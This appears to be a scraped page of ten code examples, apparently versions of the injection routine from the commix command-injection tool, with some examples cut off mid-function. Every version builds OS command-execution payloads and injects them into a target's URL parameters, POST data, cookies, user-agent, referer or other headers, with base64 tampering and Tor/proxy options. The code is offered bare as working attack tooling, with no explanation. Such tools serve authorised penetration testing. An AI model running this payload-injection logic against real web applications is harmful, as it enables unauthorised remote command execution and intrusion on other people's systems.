Esempio n. 1
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell):

    if alter_shell:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution(separator, TAG, cmd)

    if separator == " ":
        payload = re.sub(" ", "%20", payload)
    else:
        payload = re.sub(" ", whitespace, payload)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":
            # Check if its not specified the 'INJECT_HERE' tag
            url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = "".join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Check if defined any HTTP Proxy.
            if menu.options.proxy:
                try:
                    response = proxy.use_proxy(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
                    raise SystemExit()

            # Check if defined Tor.
            elif menu.options.tor:
                try:
                    response = tor.use_tor(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
                    raise SystemExit()

            else:
Esempio n. 2
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace,
              http_request_method, url, vuln_parameter, alter_shell):

    if alter_shell:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution(separator, TAG, cmd)

    if separator == " ":
        payload = re.sub(" ", "%20", payload)
    else:
        payload = re.sub(" ", whitespace, payload)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":
            # Check if its not specified the 'INJECT_HERE' tag
            url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Check if defined any HTTP Proxy.
            if menu.options.proxy:
                try:
                    response = proxy.use_proxy(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error : " + str(
                        err) + Style.RESET_ALL
                    raise SystemExit()

            # Check if defined Tor.
            elif menu.options.tor:
                try:
                    response = tor.use_tor(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error : " + str(
                        err) + Style.RESET_ALL
                    raise SystemExit()

            else:
Esempio n. 3
0
def injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter):
  
  # Execute shell commands on vulnerable host.
  payload = cb_payloads.cmd_execution(separator,TAG,cmd)
  
  if separator == " " :
    payload = re.sub(" ", "%20", payload)
  else:
    payload = re.sub(" ", whitespace, payload)

  # Check if defined "--prefix" option.
  if menu.options.prefix:
    prefix = menu.options.prefix
    payload = prefix + payload
  else:
    payload = prefix + payload
    
  # Check if defined "--suffix" option.
  if menu.options.suffix:
    suffix = menu.options.suffix
    payload = payload + suffix
  else:
    payload = payload + suffix
      
  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    vuln_parameter = ''.join(vuln_parameter)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)	
      
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
	proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	opener = urllib2.build_opener(proxy)
	urllib2.install_opener(opener)
	response = urllib2.urlopen(request)
      except urllib2.HTTPError, err:
	print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	sys.exit(1) 

    else:
      try:
	response = urllib2.urlopen(request)
	
      except urllib2.HTTPError, err:
	print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	sys.exit(1) 
Esempio n. 4
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace,
              http_request_method, url, vuln_parameter):

    # Execute shell commands on vulnerable host.
    payload = cb_payloads.cmd_execution(separator, TAG, cmd)

    if separator == " ":
        payload = re.sub(" ", "%20", payload)
    else:
        payload = re.sub(" ", whitespace, payload)

    # Check if defined "--prefix" option.
    if menu.options.prefix:
        prefix = menu.options.prefix
        payload = prefix + payload
    else:
        payload = prefix + payload

    # Check if defined "--suffix" option.
    if menu.options.suffix:
        suffix = menu.options.suffix
        payload = payload + suffix
    else:
        payload = payload + suffix

    # Check if defined "--verbose" option.
    if menu.options.verbose:
        sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

    # Check if defined method is GET (Default).
    if http_request_method == "GET":
        # Check if its not specified the 'INJECT_HERE' tag
        url = parameters.do_GET_check(url)

        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)

        # Check if defined extra headers.
        headers.do_check(request)

        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
            try:
                proxy = urllib2.ProxyHandler({'http': menu.options.proxy})
                opener = urllib2.build_opener(proxy)
                urllib2.install_opener(opener)
                response = urllib2.urlopen(request)

            except urllib2.HTTPError, err:
                print "\n(x) Error : " + str(err)
                sys.exit(1)

        else:
            response = urllib2.urlopen(request)
Esempio n. 5
0
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        if alter_shell:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = re.sub(" ", whitespace, payload)

        # Check for base64 / hex encoding
        payload = checks.perform_payload_encoding(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload))
        if settings.VERBOSITY_LEVEL > 1:
            print ""

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":

                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)

                target = re.sub(settings.INJECT_TAG, payload, url)
                vuln_parameter = ''.join(vuln_parameter)
                request = urllib2.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = urllib2.unquote(parameter)

                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                parameter = parameter.replace("+", "%2B")
                # Define the POST data
                if settings.IS_JSON == False:
                    data = re.sub(settings.INJECT_TAG, payload, parameter)
                    request = urllib2.Request(url, data)
                else:
                    payload = payload.replace("\"", "\\\"")
                    data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                                  parameter)
                    try:
                        data = json.loads(data, strict=False)
                    except:
                        pass
                    request = urllib2.Request(url, json.dumps(data))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

        return response
Esempio n. 6
0
    def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
                        http_request_method, url, vuln_parameter, alter_shell,
                        filename):
        if alter_shell:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution_alter_shell(
                separator, TAG, cmd)
        else:
            # Classic decision payload (check if host is vulnerable).
            payload = cb_payloads.cmd_execution(separator, TAG, cmd)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        payload = payload.replace(" ", whitespace)

        # Perform payload modification
        payload = checks.perform_payload_modification(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
            info_msg = "Executing the '" + cmd + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined host with "INJECT_HERE" tag
        elif menu.options.host and settings.INJECT_TAG in menu.options.host:
            response = host_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":

                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)
                target = url.replace(settings.INJECT_TAG, payload)
                vuln_parameter = ''.join(vuln_parameter)
                request = _urllib.request.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = _urllib.parse.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                parameter = ''.join(str(e)
                                    for e in parameter).replace("+", "%2B")
                # Define the POST data
                if settings.IS_JSON:
                    data = parameter.replace(
                        settings.INJECT_TAG,
                        _urllib.parse.unquote(payload.replace("\"", "\\\"")))
                    try:
                        data = checks.json_data(data)
                    except ValueError:
                        pass
                elif settings.IS_XML:
                    data = parameter.replace(settings.INJECT_TAG,
                                             _urllib.parse.unquote(payload))
                else:
                    data = parameter.replace(settings.INJECT_TAG, payload)
                request = _urllib.request.Request(
                    url, data.encode(settings.UNICODE_ENCODING))

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request.
                response = requests.get_request_response(request)

        return response
Esempio n. 7
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace,
              http_request_method, url, vuln_parameter, alter_shell, filename):

    if alter_shell:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution(separator, TAG, cmd)

    if not menu.options.base64:
        if separator == " ":
            payload = re.sub(" ", "%20", payload)
        else:
            payload = re.sub(" ", whitespace, payload)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    if menu.options.base64:
        payload = urllib.unquote(payload)
        payload = base64.b64encode(payload)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload +
                         Style.RESET_ALL)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
        response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
        response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":

            # Check if its not specified the 'INJECT_HERE' tag
            #url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = ''.join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request.
            response = get_request_response(request)

        else:
            # Check if defined method is POST.
            parameter = menu.options.data
            parameter = urllib2.unquote(parameter)

            # Check if its not specified the 'INJECT_HERE' tag
            parameter = parameters.do_POST_check(parameter)

            # Define the POST data
            if settings.IS_JSON == False:
                data = re.sub(settings.INJECT_TAG, payload, parameter)
                request = urllib2.Request(url, data)
            else:
                payload = payload.replace("\"", "\\\"")
                data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                              parameter)
                data = json.loads(data, strict=False)
                request = urllib2.Request(url, json.dumps(data))

            # Check if defined extra headers.
            headers.do_check(request)

            # Get the response of the request.
            response = get_request_response(request)

    return response
Esempio n. 8
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):

  if alter_shell:
    # Classic decision payload (check if host is vulnerable).
    payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
  else:
    # Classic decision payload (check if host is vulnerable).
    payload = cb_payloads.cmd_execution(separator, TAG, cmd)
    
  if not menu.options.base64:
    if separator == " " :
      payload = re.sub(" ", "%20", payload)
    else:
      payload = re.sub(" ", whitespace, payload)

  # Fix prefixes / suffixes
  payload = parameters.prefixes(payload, prefix)
  payload = parameters.suffixes(payload, suffix)
      
  if menu.options.base64:
    payload = urllib.unquote(payload)
    payload = base64.b64encode(payload)

  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload + Style.RESET_ALL)

  # Check if defined cookie with "INJECT_HERE" tag
  if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
    response = cookie_injection_test(url, vuln_parameter, payload)

  # Check if defined user-agent with "INJECT_HERE" tag
  elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
    response = user_agent_injection_test(url, vuln_parameter, payload)

  # Check if defined referer with "INJECT_HERE" tag
  elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
    response = referer_injection_test(url, vuln_parameter, payload)

  else:
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      
      # Check if its not specified the 'INJECT_HERE' tag
      #url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      request = urllib2.Request(target)
      
      # Check if defined extra headers.
      headers.do_check(request)    

      # Get the response of the request.
      response = get_request_response(request)
          
    else :
      # Check if defined method is POST.
      parameter = menu.options.data
      parameter = urllib2.unquote(parameter)
      
      # Check if its not specified the 'INJECT_HERE' tag
      parameter = parameters.do_POST_check(parameter)
      
      # Define the POST data  
      if settings.IS_JSON == False:
        data = re.sub(settings.INJECT_TAG, payload, parameter)
        request = urllib2.Request(url, data)
      else:
        payload = payload.replace("\"", "\\\"")
        data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
        data = json.loads(data, strict = False)
        request = urllib2.Request(url, json.dumps(data))
      
      # Check if defined extra headers.
      headers.do_check(request)

      # Get the response of the request.
      response = get_request_response(request)

  return response
Esempio n. 9
0
  def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
    if alter_shell:
      # Classic decision payload (check if host is vulnerable).
      payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
      # Classic decision payload (check if host is vulnerable).
      payload = cb_payloads.cmd_execution(separator, TAG, cmd)
      
    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)
    
    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL >= 1:
      info_msg = "Executing the '" + cmd + "' command... "
      sys.stdout.write(settings.print_info_msg(info_msg))
      sys.stdout.flush()
      sys.stdout.write("\n" + settings.print_payload(payload) + "\n")

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      response = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      response = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      response = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      response = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        
        # Check if its not specified the 'INJECT_HERE' tag
        #url = parameters.do_GET_check(url)
        target = url.replace(settings.INJECT_TAG, payload)
        vuln_parameter = ''.join(vuln_parameter)
        request = urllib2.Request(target)
        
        # Check if defined extra headers.
        headers.do_check(request)    

        # Get the response of the request.
        response = requests.get_request_response(request)
            
      else :
        # Check if defined method is POST.
        parameter = menu.options.data
        parameter = urllib2.unquote(parameter)
        
        # Check if its not specified the 'INJECT_HERE' tag
        parameter = parameters.do_POST_check(parameter)
        parameter = parameter.replace("+","%2B")
        # Define the POST data  

        if settings.IS_JSON:
          payload = payload.replace("\"", "\\\"")
          data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
          try:
            data = json.loads(data, strict = False)
          except:
            pass
          request = urllib2.Request(url, json.dumps(data))
        else:
          if settings.IS_XML:
            data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) 
          else:  
            data = parameter.replace(settings.INJECT_TAG, payload)
          request = urllib2.Request(url, data)
        
        # Check if defined extra headers.
        headers.do_check(request)

        # Get the response of the request.
        response = requests.get_request_response(request)
   
    return response
Esempio n. 10
0
def injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):

  if alter_shell:
    # Classic decision payload (check if host is vulnerable).
    payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
  else:
    # Classic decision payload (check if host is vulnerable).
    payload = cb_payloads.cmd_execution(separator, TAG, cmd)
    
  # Fix prefixes / suffixes
  payload = parameters.prefixes(payload, prefix)
  payload = parameters.suffixes(payload, suffix)

  # Whitespace fixation
  payload = re.sub(" ", whitespace, payload)

  if settings.TAMPER_SCRIPTS['base64encode']:
    from src.core.tamper import base64encode
    payload = base64encode.encode(payload)

  # Check if defined "--verbose" option.
  if settings.VERBOSITY_LEVEL >= 1:
    sys.stdout.write("\n" + settings.print_payload(payload))

  # Check if defined cookie with "INJECT_HERE" tag
  if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
    response = cookie_injection_test(url, vuln_parameter, payload)

  # Check if defined user-agent with "INJECT_HERE" tag
  elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
    response = user_agent_injection_test(url, vuln_parameter, payload)

  # Check if defined referer with "INJECT_HERE" tag
  elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
    response = referer_injection_test(url, vuln_parameter, payload)

  # Check if defined custom header with "INJECT_HERE" tag
  elif settings.CUSTOM_HEADER_INJECTION:
    response = custom_header_injection_test(url, vuln_parameter, payload)

  else:
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      
      # Check if its not specified the 'INJECT_HERE' tag
      #url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      request = urllib2.Request(target)
      
      # Check if defined extra headers.
      headers.do_check(request)    

      # Get the response of the request.
      response = requests.get_request_response(request)
          
    else :
      # Check if defined method is POST.
      parameter = menu.options.data
      parameter = urllib2.unquote(parameter)
      
      # Check if its not specified the 'INJECT_HERE' tag
      parameter = parameters.do_POST_check(parameter)
      
      # Define the POST data  
      if settings.IS_JSON == False:
        data = re.sub(settings.INJECT_TAG, payload, parameter)
        request = urllib2.Request(url, data)
      else:
        payload = payload.replace("\"", "\\\"")
        data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
        try:
          data = json.loads(data, strict = False)
        except:
          pass
        request = urllib2.Request(url, json.dumps(data))
      
      # Check if defined extra headers.
      headers.do_check(request)

      # Get the response of the request.
      response = requests.get_request_response(request)

  return response